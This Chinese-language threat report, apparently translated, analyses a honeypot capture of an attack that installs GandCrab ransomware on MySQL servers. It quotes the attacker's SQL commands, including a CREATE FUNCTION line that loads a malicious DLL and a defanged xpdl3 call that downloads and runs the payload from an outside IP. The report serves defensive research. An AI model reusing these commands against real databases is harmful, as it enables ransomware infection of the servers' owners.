攻击MySQL服务器传播GandCrab勒索软件

研究人员在实验室环境中搭建了一个蜜罐系统，监听着SQL服务器使用的默认端口（TCP/3306端口）。该蜜罐系统发现来自美国机器的攻击。研究人员监控了僵尸网络生成的网络流量和行为，发现该Linux蜜罐下载了一个Windows可执行文件。

攻击者首先用SQL数据库命令在上传helper DLL到服务器，然后作为数据库函数调用该DLL来提取IP地址位于加拿大魁北克省的主机上的GandCrab payload。

数据库服务器下载GandCrab

SQL攻击

攻击的第一阶段是攻击者连接到数据库服务器，然后确定他运行的是MySQL。因为蜜罐系统模拟了MySQL，因此攻击的后面部分就非常顺利。

攻击者释放的SQL命令

然后，攻击者使用set命令来上传所有的字节，这些字节组成了helper DLL，这些字节是长字符串格式的十六进制字符，在内存中会作为变量。

helper DLL作为输出进入数据库，就像真的长记录一样

然后攻击者将变量的内容写入创建的数据库表yongger2中。

然后攻击者发布命令给服务器将这些字节拼接成一个文件，然后释放到服务器的插件目录中。研究人员还发现许多用于交换斜杠和反斜杠字符的命令，目的是绕过安全特征。

Helper DLL的内部功能

DLL看似会向数据库增加3个函数，分别是xpdl3, xpdl3_deinit, xpdl3_init。DLL只是许多恶意工具箱的一个组件，之前就被上传到VirusTotal这样的平台上。

helper DLL包含在许多含有恶意工具集的文档中

攻击者会发布SQL命令来释放yongger2 table，删除通过服务器的文件轨迹记录，释放函数xpdl3。最后，使用下面的SQL命令来创建新的数据库函数xpdl3来调用该DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

将helper DLL传到数据库服务器的插件目录并初始化后，攻击者就会发布SQL命令道服务器中，调用新添加的xpdl3函数：

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')

Wireshark中发现的网络事件序列

如果一切正常，数据库服务器就会从远程机器下载GandCrab payload，并释放到C盘根目录，命名为isetup.exe并执行。

这种攻击很流行

针对数据库服务器的攻击并不少见，而且这个趋势未来可能会继续。就在5月19日这个攻击就发生在真实的MySQL服务器上，机器应该已经被加密。

开放目录使用HFS，含有中文用户接口

但是文件所在的URL指向的是位于web服务器的开放目录，web服务器运行的是HFS服务器软件，这是一个基于Windows的web服务器。

但保存GandCrab样本的机器的IP地址的位置为美国的亚利桑那州，但机器安装的HFS用户接口是简体中文。而且显示有人多次下载了服务器上的文件。

开放目录显示有5个以3306开头的Windows可执行文件，之后是连字符-，实际上是同一文件的多个重命名版本。只有3306.exe文件与其余的不同。目录中还含有名为RDP的恶意Linux ELF可执行文件，但是本次攻击活动中没有使用。

RDP文件是相关的DDOS Linux木马的样本之一

服务器显示样本3306-1.exe的下载量超过500次。所有样本加起来5天下载了接近800，开放目录中的GandCrab样本下载量超过2300次。

虽然目前还没有大规模攻击和广泛传播，但是确实对MySQL服务器管理员带来了巨大的威胁，因为3306端口会成为攻击者的一个跳板。